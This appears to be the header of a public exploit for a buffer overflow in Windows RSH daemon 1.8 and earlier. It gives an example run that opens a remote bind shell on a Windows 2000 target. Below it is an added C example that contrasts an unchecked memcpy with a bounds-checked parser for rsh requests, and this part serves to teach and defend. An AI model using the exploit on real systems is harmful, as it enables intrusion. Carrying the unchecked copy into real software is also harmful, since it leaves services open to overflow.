Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
 * Windows RSH daemon <=1.8 remote exploit
 * =======================================
 * rshd is a multithreaded daemon service that listens for connections on port 514
 * (tcp port for the shell/cmd protocol), runs commands passed by clients and sends back the
 * results. Insufficient bounds checking performed during a memory copy operation in the RSH daemon
 * makes the service susceptible to a remotely exploitable buffer overflow condition.
 *
 * Example Use.
 * debian:~/prdelka-vs-MS-rshd# ./prdelka-vs-MS-rshd -s 192.168.184.131 -x 0 -t 12 2>/dev/null
 * [ Windows RSH daemon 1.8 remote exploit
 * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
 * [ Using target 'Windows 2000 5.0.0.0 SP0 (x86)'
 * [ Connected to 192.168.184.131 (514/tcp)
 * [ Connecting to shell on 192.168.184.131 (4444/tcp)
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-1999 Microsoft Corp.
 *
 * dir
 * C:\Program Files\rshd\bin>dir
 *  Volume in drive C has no label.
 *  Volume Serial Number is C0F4-19C8
 *
 *  Directory of C:\Program Files\rshd\bin
 *
 * 26/07/2007  15:18    <DIR>          .
 * 26/07/2007  15:18    <DIR>          ..
 * 26/07/2007  15:18            73,728 rshd.exe
 *                1 File(s)         73,728 bytes
 *                2 Dir(s)   6,839,975,936 bytes free
 *
 * - prdelka
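The advisory's root cause is a memory copy into a fixed-size buffer with no length check. The C below is an added illustration of that defect and its fix, not code from rshd or from the exploit author: it parses the four NUL-terminated fields of a BSD-style rsh request (stderr port, local user, remote user, command) the way a hardened daemon should, refusing any field that would not fit its destination buffer. The field layout follows the classic rsh protocol; the buffer sizes, function names and sample requests are illustrative choices made here, not values taken from the vulnerable daemon.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Illustrative field limits chosen for this example (not rshd's real sizes). */
#define MAX_PORT 8
#define MAX_USER 64
#define MAX_CMD  256

struct rsh_request {
    char port[MAX_PORT];
    char locuser[MAX_USER];
    char remuser[MAX_USER];
    char command[MAX_CMD];
};

/* The flawed pattern the advisory describes: the client controls src_len,
 * so a field longer than dst writes past the end of the buffer.
 * Shown for contrast only; parse_rsh_request() never calls it. */
void copy_unchecked(char *dst, const char *src, size_t src_len) {
    memcpy(dst, src, src_len);  /* overflows when src_len >= sizeof dst */
    dst[src_len] = '\0';
}

/* Hardened form: reject any field that does not fit, leaving room for the NUL. */
static int copy_checked(char *dst, size_t dst_size, const char *src, size_t src_len) {
    if (src_len >= dst_size)
        return -1;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return 0;
}

/* Parse "port\0locuser\0remuser\0command\0" from buf (len bytes).
 * Returns 0 on success, -1 if a field is missing or exceeds its limit. */
int parse_rsh_request(const unsigned char *buf, size_t len, struct rsh_request *req) {
    char *dsts[4] = { req->port, req->locuser, req->remuser, req->command };
    size_t sizes[4] = { sizeof req->port, sizeof req->locuser,
                        sizeof req->remuser, sizeof req->command };
    size_t pos = 0;
    for (int i = 0; i < 4; i++) {
        /* Locate the terminator inside the bytes we actually received. */
        const unsigned char *nul = memchr(buf + pos, '\0', len - pos);
        if (nul == NULL)
            return -1;  /* truncated request: field has no terminator */
        size_t field_len = (size_t)(nul - (buf + pos));
        if (copy_checked(dsts[i], sizes[i], (const char *)buf + pos, field_len) != 0)
            return -1;  /* field would overflow its buffer: refuse it */
        pos = (size_t)(nul - buf) + 1;
    }
    return 0;
}

/* Constructed sample: a well-formed request parses and yields its command. */
int demo_valid_request(void) {
    static const unsigned char msg[] = "0\0operator\0operator\0dir\0";
    struct rsh_request req;
    if (parse_rsh_request(msg, sizeof msg - 1, &req) != 0)
        return -1;
    return strcmp(req.command, "dir") == 0 ? 0 : -2;
}

/* Constructed sample: a command field longer than MAX_CMD is rejected
 * instead of being copied past the end of req.command. */
int demo_oversized_command(void) {
    unsigned char msg[MAX_CMD + 64];
    size_t pos = 0;
    memcpy(msg, "0\0u\0u\0", 6);
    pos = 6;
    memset(msg + pos, 'A', MAX_CMD + 16);
    pos += MAX_CMD + 16;
    msg[pos++] = '\0';
    struct rsh_request req;
    return parse_rsh_request(msg, pos, &req);  /* -1: rejected */
}

int main(void) {
    printf("valid request:     %d\n", demo_valid_request());
    printf("oversized command: %d\n", demo_oversized_command());
    return 0;
}
```

The important design point is that the length check happens before the copy and is driven by the destination's size, not by anything the client sent; a daemon that instead trusts the client-supplied length, as the advisory describes, is what turns a long command field into a remotely triggered overflow.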
http://www.vfocus.net/art/20080118/3326.html